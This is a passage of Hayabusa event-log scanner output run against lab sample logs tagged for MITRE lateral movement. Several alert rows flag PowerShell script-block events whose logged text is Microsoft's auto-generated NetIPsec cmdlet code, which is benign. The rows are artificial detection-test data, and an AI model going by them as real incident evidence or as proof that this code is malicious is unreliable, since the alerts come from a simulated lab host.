($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 